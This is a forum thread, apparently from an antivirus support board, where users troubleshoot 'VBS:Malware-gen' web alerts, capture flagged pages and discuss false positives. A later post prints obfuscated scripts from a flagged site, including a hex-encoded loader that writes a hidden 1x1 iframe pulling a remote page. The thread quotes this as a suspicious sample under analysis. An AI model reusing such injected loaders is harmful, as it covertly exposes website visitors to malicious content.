VBS:Malware-gen

[wyrmrider]

How bout copying them to the user section of the chest and also uploading to virus total?
It would be nice to see how dangerous these hits are

lukosanthropos
looks as if we are making some progress- you lurking?

[DavidR]

As soon as you get the webshield warning, go to your temp directory, in _avast4_ subdir you'll find the temporary files. You can copy them elsewhere and then let webshield to delete them from the temp. One of the tempfiles would be that problematic page.

I tried what you suggested, even had the _avast_ sub directory open waiting, tried to logon and got the alert, left the alert window open and no unp files appear on the alert by avast, even refreshed folder but no files in that location.

Clicked the Abort connection to close the alert window and no unp files found, did a search for unp*.tmp and found two (unrelated to this, ashMaiSv.exe created these), both in the windows\temp\_avast4_ folder so it isn't using the folder avast created in C:\Documents and Settings\UserName\Local Settings\Temp\_avast4_

So I'm out, can't capture even the unp files.

Edit, OK tried again and managed to capture the unp file, will send it for analysis as a possible FP.

[kubecj]

Strange. While the dialogue is opened, the file should be in temp\_avast4_. Where is located your temp depends on your settings.

[DavidR]

For some reason there are two _avast4_ folders on my system, I was watching the wrong one first time out, watching the windows\temp\_avast4_ second time and was able to capture the file.

Update, uploaded the unp*.tmp file to VT and 7/36 detections (includes GData), see http://www.virustotal.com/analisis/54cbd22b1a6bbe88fd4de3c0822a914a

There is a script tag that has what avast must think is suspect/malicious, see code below.

Code: [Select]

<script type="text/javascript">
eval(unescape("%64%6F[deleted]%29%3B"));
</script>


[xenio]

I am getting a virus warning of: VBS:Malware-gen
in this web site: www.dinamobasket.com

but there is no encrypted javascript code in it.
any idea?
Thanks

[jsejtko]

Hello,

detection of

Code: [Select]

www.dinamobasket.com is a false positive and will be corrected in next vps update. Thanks for information.

[pedro1612]

I'm getting a virus warning of " VBS:Malware-gen"
in all websites of  *.freecoolsite.com

for example:

f.freecoolsite.com
prayudi.freecoolsite.com
homebased.freecoolsite.com
spidernet.freecoolsite.com

my version of VPS: 080926-0

[Lisandro]

I'm getting a virus warning of " VBS:Malware-gen"
in all websites of  *.freecoolsite.com

Dr. Web returned clean. But I trust much more on avast detection than it.
Maybe some obfuscated or encrypted script (malicious ) could be in that pages.

[Casaboontha]

site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229

[DavidR]

@ pedro1612
It certainly looks like an FP I captured one page (Sign of "VBS:Malware-gen" has been found in "hXXp://f.freecoolsite.com/" file.) and uploaded it to virustotal and effectively only avast detects anything.
See VT results http://www.virustotal.com/analisis/0ab73679254a792a8d003af65677aa3f.

With the domain name followed by /" file. I don't know if avast is looking at one of the external links or the default page (which it seems to do or it wouldn't alert on the page I captured).

I didn't see anything obvious in the page that would trigger the alert.

I have sent a sample to avast for further analysis.

[Lisandro]

It certainly looks like an FP

David, can you manage the code of that page and see if it is obfuscated or encrypted?
I really trust on avast websites detections... it's quite improved compared to other antivirus.

[DavidR]

It doesn't look like obfuscated or encrypted code, as I said I cant see anything obvious (which given my limited experience isn't a certainty).

[pedro1612]

Thank you!!
Maybe it's something in the ad's added automatically by a hosting provider... ?  

[DavidR]

site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229

I have had a look at this page and there are several batches of javascript that could be making avast alert as the code appears obfuscated and avast isn't alone in detecting something, see http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b.

Like this

Code: [Select]

<script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;';
 addy42235 = addy42235 + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';
 var addy_text42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;' + 'h&#111;tm
&#97;&#105;l' + '&#46;' + 'c&#111;m';
 document.write( '<a ' + path + '\'' + prefix + ':' + addy42235 + '\'>' );
 document.write( addy_text42235 );
 document.write( '<\/a>' );
 //-->\n </script>

I haven't enough experience to know what is trying to be achieved but it isn't clear (javascript is a plain language) what is going on and this 'could' be the reason.

This one especially looks very suspicious, I have broken down the single line of code (as it would be huge) into something easier to read.

Code: [Select]

<script type="text/javascript">
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return
A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C
(AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD,
FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F7
66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312
06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70
6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>


[DavidR]

Thank you!!
Maybe it's something in the ad's added automatically by a hosting provider... ?  

You're welcome.

I have no idea if that might be the case, but there wasn't anything like that as far as I could tell, we will have to wait for avast to analyse it and correct the VPS if it is as I suspect an FP. They are usually quick to correct once identified.